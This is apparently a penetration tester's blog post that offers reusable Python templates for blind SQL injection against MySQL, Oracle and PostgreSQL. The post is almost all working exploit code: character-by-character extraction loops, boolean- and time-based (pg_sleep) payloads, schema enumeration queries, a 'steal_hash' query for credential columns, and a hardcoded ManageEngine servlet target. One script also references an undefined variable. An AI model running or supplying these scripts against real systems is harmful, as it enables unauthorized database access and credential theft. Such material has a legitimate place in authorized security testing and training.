---
layout: post
title: "template for blind sql"
tags: pt
---

this one assumes it's a POST request and it's MySQL. amend accordingly for GET request (python requests.get with params) and other DB languages.

```python
#!/usr/bin/env python3

import requests
import re
import sys
import hashlib

target = '' #put sqli vulnerable URL here

def send2(sqli):
    for j in range(32, 126):
        # now we update the sqli
        mod_sqli = sqli.replace("[CHR]", str(j))
        payload     = {'some parameter':'1', 'vulnerable parameter':'%s' % mod_sqli}
        r = requests.post(target, data=payload) #, proxies={"http":"http://127.0.0.1:8080"})
        resp = re.search("Any text in response that indicates boolean TRUE", r.text)
        if resp:
            return j
    return None

def exfil2(query):
    data = ""
    query = "select/**/" + query
    query = "ascii(substring((%s),[POS],1))" % query
    for i in range(1,2000):
        sqli = "test'/**/or/**/(%s)=[CHR]/**/or/**/1='" % query
        sqli = sqli.replace('[POS]',str(i))
        #print ('sqli: ' + sqli)
        try:
            extracted_char = chr(send2(sqli))
            sys.stdout.write(extracted_char)
            sys.stdout.flush()
            data += extracted_char
        except:
            return data
    return data

show_version = "version()"
show_db = "database()"
show_tables = "group_concat(concat(table_name)/**/separator/**/';')/**/from/**/information_schema.tables/**/where/**/table_schema=database()"
show_columns = "group_concat(concat(column_name)/**/separator/**/';')/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='RESULT_FROM_show_tables'"
steal_hash = "group_concat(concat(RESULT_FROM_show_columns,':',RESULT2_FROM_show_columns)/**/separator/**/';')/**/from/**/RESULT_FROM_show_tables"

exfil2(steal_hash) #insert desired sql query here

```

update! recently did a oracle one for a client:
```python
#!/usr/bin/env python3

import requests
import re
import sys
import time

target = "" #put sqli vulnerable URL here

def send3(sqli):
    payload = {
                "vulnerable_param":"blabla%s" % sqli,
        }

    r = requests.get(target, params=payload) #, proxies={"http":"http://127.0.0.1:8080"})
    resp = re.search("been saved successfully", r.text)
    if resp:
        return True
    else:
        return False
    pass

#base_sqli = "' or ('1') = '1'--"
query = "select banner FROM v$version where banner like 'Oracle%'"

def send4(sqli_c):
    for i in range(32,126):
        #print (str(i))
        mod_sqli = sqli_c.replace('[CHR]',str(i))
        #print (mod_sqli)
        if (send3(mod_sqli)):
            return i
    pass
#send4(sqli_c)

def exfil3(query):
    data = ""
    for i in range(1,2000):
        sqli = "' or (select ascii((substr((%s),[POS],1))) from dual) = '[CHR]'--" % query
        sqli = sqli.replace('[POS]',str(i))
        try:
            extract_chr = chr(send4(sqli))
            sys.stdout.write(extract_chr)
            sys.stdout.flush()
            data += extract_chr
        except:
            return data
    return data

if __name__ == "__main__":
    banner += "[+] PROOF OF CONCEPT\n"
    banner += "[+] Targeted query: " + query + "\n"
    banner += "[+] Extracting query ...\n"
    print (banner)
    exfil3(query)
```

and a postgresql one from practice:

```python
#!/usr/bin/env python3

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def send1(sqli): #blind true-false
    url = "https://manageengine:8443/servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=3;"

    payload = "select case when (%s) then pg_sleep(2) else pg_sleep(0) end" % sqli
    
    payload = payload + ";--"
    url = url + payload

    r = requests.get(url, verify=False)
    time = r.elapsed.total_seconds()
    #print (int(time))
    if int(time) > 1:
        return True
    pass

base_query = "select 1=1"
test_query = "ascii(substr((select version()),1,1)) = 80"
#send1(test_query) #pass

def send2(sqli):
    for j in range(32, 126):
        #print ("trying chr: " + str(j))
        mod_sqli = sqli.replace("[CHR]", str(j))
        if send1(mod_sqli):
            #print ("found: " + chr(j))
            return j
    return None

test_query = "ascii(substr((select version()),1,1)) = [CHR]"
#send2(test_query) #pass

def exfil2(query):
    data = ""
    #query = "select/**/" + query
    query = "ascii(substr((%s),[POS],1)) = [CHR]" % query
    for i in range(1,2000):
        sqli = query.replace('[POS]',str(i))
        #print ('sqli: ' + sqli)
        try:
            extracted_char = chr(send2(sqli))
            sys.stdout.write(extracted_char)
            sys.stdout.flush()
            data += extracted_char
        except:
            return data
    return data

test_query = "version()"
exfil2(test_query)
```
